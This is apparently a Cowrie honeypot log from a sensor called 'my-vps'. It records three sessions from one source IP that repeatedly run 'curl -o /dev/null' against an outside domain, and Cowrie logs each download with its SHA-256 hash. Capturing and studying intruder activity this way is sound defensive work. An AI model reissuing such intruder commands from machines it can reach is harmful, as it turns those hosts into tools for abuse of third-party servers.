{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.085769Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.109102Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.109756Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.119390Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.122437Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.123043Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.140362Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.141109Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.146140Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.151445Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.152104Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.171884Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.172623Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.177238Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.177952Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.186788Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.187438Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.214735Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.216827Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.217369Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.220967Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.221751Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.222346Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.226471Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.227075Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.265955Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.267516Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.269790Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.270894Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.271549Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.273352Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.274010Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.275490Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.276018Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.310000Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.311970Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.314545Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.316209Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.316803Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.318897Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.320208Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.321702Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.322267Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.331789Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.358439Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.359170Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.361130Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.361888Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.363044Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.363711Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.366981Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.400191Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.401138Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.401609Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.403204Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.403861Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.405429Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.406070Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.441585Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.442501Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.443137Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.445885Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.446537Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.450803Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.451417Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.483049Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.484900Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.486572Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.487322Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.490929Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.493902Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.494567Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.496574Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.497242Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.527966Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.528646Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.533652Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.534256Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.535563Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.536384Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.568542Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.570267Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.570916Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.574507Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.575189Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.576773Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.577325Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.620778Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.622082Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.626512Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.628601Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.629423Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:26.635039Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:26.635839Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
